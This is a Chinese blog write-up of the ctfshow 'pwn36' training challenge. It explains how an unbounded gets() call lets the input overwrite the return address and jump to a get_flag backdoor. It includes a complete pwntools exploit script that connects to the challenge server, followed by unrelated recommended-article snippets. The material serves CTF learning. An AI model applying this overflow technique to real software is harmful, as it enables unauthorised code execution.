ctfshow pwn入门--栈溢出pwn36

已于 2023-09-14 21:14:23 修改
阅读量231 收藏
点赞数
文章标签: 学习方法 笔记
于 2023-09-14 21:05:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiesiyuan1/article/details/132865871
版权

题目

检查保护

可以看到,32位仅部分开启RELRO保护

pwn的四种保护请参考

pwn四种基本保护_pwn library_folly_zhou的博客-优快云博客

进入32位IDA查看伪代码

进入main函数,按f5进入反编译

进入ctfshow函数

可以看到,在ctfshow函数中,gets函数无限制读取字符串,容易导致栈溢出漏洞

题目提示存在后门函数,可以在函数一栏找到get_flag函数

双击查看get_flag函数,

fopen函数

  • 函数功能:打开一个文件
  • 头文件:#include<stdio.h>
  • 函数原型:
FILE*  fopen(
    _In_z_ char const* _FileName,
    _In_z_ char const* _Mode
    );
  • 参数说明

filename:想要打开的文件路径及文件名

mode:代表流形式,其中r为只读方式打开

get_flag函数的内容:以只读的形式打开/ctfshow_flag文件,如果打开失败,则输出没有哪个文件或目录,打开成功则输出/ctfshow_flag文件的内容

做题思路

控制程序的流程,使他跳转到get_flag函数,从而输出flag

exp

from pwn import *  #导入pwn模块
context(arch='i386',os='linux',log_level='debug') 
#io=process('./pwn')  #本地测试
io=remote('pwn.challenge.ctf.show',28159)  #远程连接
elf=ELF('./pwn')
get_flag=elf.sym['get_flag']  #查找get_flag函数的地址
payload=cyclic(0x28+4)+p32(get_flag)  #构造payload
io.sendline(payload)  #发送payload
io.interactive()  #进入交互模式

输入命令,执行exp.py文件

参考文章:C语言-- 流式文件操作【上】_file文件流 文本方式写入 c_WaitFoF的博客-优快云博客

王绍煜
关注
CTF总结-PWN
qq_42747131的博客
05-14 7336
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
CTFSHOW-PWN入门-栈溢出(35-42)
2402_84585385的博客
10-09 992
发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x80487BA。发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x400872。ctfshow函数中的,v1大小为14,而read函数读取大小为50,所以read函数存在栈溢出,使用cyclic计算栈偏移量为22。ctfshow函数中的read函数存在栈溢出,cyclic计算栈偏移量为18。
CTFshow-PWN-栈溢出pwn36
Welcome To Myon'Blog !
04-23 1217
每次调用 puts 函数时,它都会再次进入函数体内,然后又调用 puts 函数,这样就形成了无限递归调用。声明了一个长度为 36 字节的字符数组 s,调用 gets 函数,并将 s 数组作为参数传递给它,然后将 gets 函数的返回值作为 ctfshow 函数的返回值。这个特定的 puts 函数定义中,函数体内部再次调用了 puts 函数,并且传递了相同的参数 s。disass 是 GDB 的指令,这里是反汇编名为 get_flag 的函数。这里 s 数组存在栈溢出的可能,具体看后面的分析,
CTFshow-pwn入门-栈溢出pwn35-pwn36
你们de4月天的博客
06-21 1336
CTFshow-pwn入门-栈溢出pwn35-pwn36
ctfshow做题笔记—前置基础—pwn32~pwn36
Yilanchia的博客
02-03 702
首先是logo()打印的是ctfshow的一些信息,然后将v4[10]数组赋给buf1[10]数组,将CTFshowPWN赋给buf2,然后打印buf1和buf2,之后strto将argv[3]转化为10进制数并赋给v5,memcpy(buf1, argv[2], v5);_FORTIFY_SOURCE=2:除了基本检查外,还会在运行时进行更严格的检查,例如更精确的缓冲区边界检查。_FORTIFY_SOURCE=3:这是较新的级别,提供了更高级的检查,例如动态对象大小检查。所以输入参数使argc>5即可。
PWN入门(1)基础知识和环境设置
Ba1_Ma0的博客
09-07 4774
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
linux pwn 基础知识
sky123博客
08-11 3329
环境搭建 虚拟机安装 镜像下载网站 为了避免环境问题建议 22.04 ,20.04,18.04,16.04 等常见版本 ubuntu 虚拟机环境各准备一份。注意定期更新快照以防意外。 虚拟机建议硬盘 256 G 以上,内存也尽量大一些。硬盘大小只是上界,256 G 不是真就占了 256 G,而后期如果硬盘空间不足会很麻烦。 基础工具 vim sudo apt install vim gedit 不习惯 vim 的可以使用 gedit 文本编辑器。 sudo apt install gedit git
CTFshow-pwn入门-栈溢出 (慢慢更
akdelt的博客
01-31 3566
当应用程序试图对无权访问的内存地址进行读写操作时,会调用 sigsegv_handler 函数,sigsegv_handler 函数 会把stderr打印输出,即将flag的值打印输出那么我们直接输入超长数据就会溢出,程序就会崩溃进而打印出flag。char dest;该函数无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,且提供后门函数 get_flag()堆栈不可执行,不过有后门函数,跟进 ctfshow 函数,read 可以读取 50 个字节。
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1607
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFshow-PWN入门-栈溢出38-40详解 持续更新
王慕杨。的博客
09-06 936
本来是不想写的,但是想想还是写一下吧,基础知识这些就先不写了,以后有时间再补上吧,比较懒前面的有时间再写吧 主要是做过了。。懒。
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 2382
本文主要详解CTFshowpwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5441
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
栈溢出 pwn36
qq_68179428的博客
03-28 489
评价:利用栈溢出覆盖到返回地址为后门程序的ret2text类型的签到题。
MSTNet:用于糖尿病视网膜病变分类的多尺度空间感知 Transformer 与多实例学习方法|文献速递-深度学习医疗AI最新文献
weixin_38594676的博客
05-30 884
Title题目MSTNet: Multi-scale spatial-aware transformer with multi-instance learning for diabetic retinopathy classificationMSTNet:用于糖尿病视网膜病变分类的多尺度空间感知 Transformer 与多实例学习方法01文献速递介绍糖尿病视网膜病变(DR)是糖尿病的主要并发症之一,影响全球数百万人,严重威胁视力健康并可能导致成人失明(Heald等人,2020;Teo等人,2021)。约三
一些较好的学习方法
MingYue_SSS的博客
05-22 1197
一些学习方法
uni-app学习笔记十五-vue3页面生命周期(二)
shenxiaomo1688的博客
05-28 618
onShow:用于监听页面显示,页面每次出现在屏幕上都触发,包括从下级页面点返回露出当前页面;onHide:监听页面隐藏,当离开当前页面时触发。
pikachu靶场通关笔记07 XSS关卡03-存储型XSS
mooyuan的网络安全博客
05-29 863
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到XSS风险的真实原因,讲解XSS的原理并进行渗透实践,本文为XSS关卡03-存储型XSS的渗透部分。
学习笔记:3个学习AI路上反复看到的概念:RAG,Langchain,Agent
最新发布
FBeetle的博客
05-31 361
RAG的能力核心是有效结合了检索和生成两种方法。基本思路是把私有数据进行切片,向量化后通过向量检索进行召回,再作为上下文输入到通用大模型,模型再进行分析和回答。同时,AI Agent也可以利用RAG技术来提高其在特定任务(如问答或对话系统)中的性能,尤其是在需要外部知识来支持决策时。RAG可以作为LangChain(如果它是一个语言处理工具)的一部分,用于提供更加丰富和准确的语言生成能力。AI Agent可能使用LangChain来处理自然语言的任务,比如理解用户输入和生成响应。
【C语言极简自学笔记】项目开发——扫雷游戏
LQYYDSY的博客
05-29 581
本次项目旨在使用 C 语言开发一个控制台版本的扫雷游戏,实现以下基本功能: 初始化游戏棋盘,包括雷区的布置和非雷区域周围雷数的计算。 玩家通过输入坐标来翻开棋盘格子,若翻开雷则游戏失败,若翻开所有非雷格子则游戏胜利。 提供标记雷的功能,方便玩家识别可能有雷的区域。 具备良好的用户交互界面,显示棋盘状态和游戏提示信息。
ctfshow pwn入门栈溢出
04-02
嗯,用户想学习CTFShow平台上的PWN入门栈溢出攻击技巧,包括教程、原理和实例。好的,我需要先回顾栈溢出的基本原理,然后结合CTFShow的题目例子来解释。首先,栈溢出是覆盖返回地址来控制程序流程,对吧?比如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值